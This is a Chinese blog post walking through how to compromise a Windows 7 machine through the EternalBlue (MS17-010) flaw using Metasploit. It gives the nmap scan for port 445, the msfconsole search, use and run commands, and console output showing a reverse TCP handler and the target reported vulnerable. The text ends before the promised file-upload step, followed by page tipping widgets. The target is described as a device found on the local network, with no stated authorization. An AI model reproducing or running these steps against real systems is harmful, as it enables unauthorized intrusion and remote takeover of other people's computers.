Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件

本文介绍了如何通过msfconsole使用永恒之蓝漏洞入侵Win7系统,包括信息收集、启动msfconsole搜索漏洞、设置参数进行入侵,以及成功后如何上传并执行文件。在入侵过程中,作者演示了从扫描目标445端口到成功获得系统控制权的全过程,并尝试在系统中运行DEV-C++,虽然遇到错误,但展示了远程执行文件的可行性。
摘要由CSDN通过智能技术生成

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档


前言

提示:这里可以添加本文要记录的大概内容:

我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。


提示:以下是本篇文章正文内容,下面案例可供参考

一、信息收集

第一步,信息收集
在这里插入图片描述
先查找自己的IP地址以方便查找同局域网的设备
在这里插入图片描述
然后使用nmap -O以一个一个扫
看我找到了什么
在这里插入图片描述
找到了,正好开放445端口
在这里插入图片描述

二、开始入侵

1.启动msfconsole

msfconsole

在这里插入图片描述
启动成功了,搜索ms漏洞

2.搜索漏洞

search ms17_010

然后扔给我们这些东西,以前用过的知道该使用哪个
在这里插入图片描述
输入:

use exploit/windows/smb/ms17_010_eternalblue

在这里插入图片描述
看到这个样子就是成功了,然后我们执行下一步,查找要设置的参数,输入options
在这里插入图片描述
yes是必须要设置的,no可以弄也可以不弄,我懒得弄了,
在这里插入图片描述
IP一定要设为目标的IP地址,然后我们再options
在这里插入图片描述
已经都准备好了,可以进行入侵了,输入

run

在这里插入图片描述

[*] Started reverse TCP handler on 192.168.22.13:4444 

这串代码讲的是开始反向TCP监听,监听本机的IP和端口

192.168.22.196:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.22.196:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

「已注销」

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值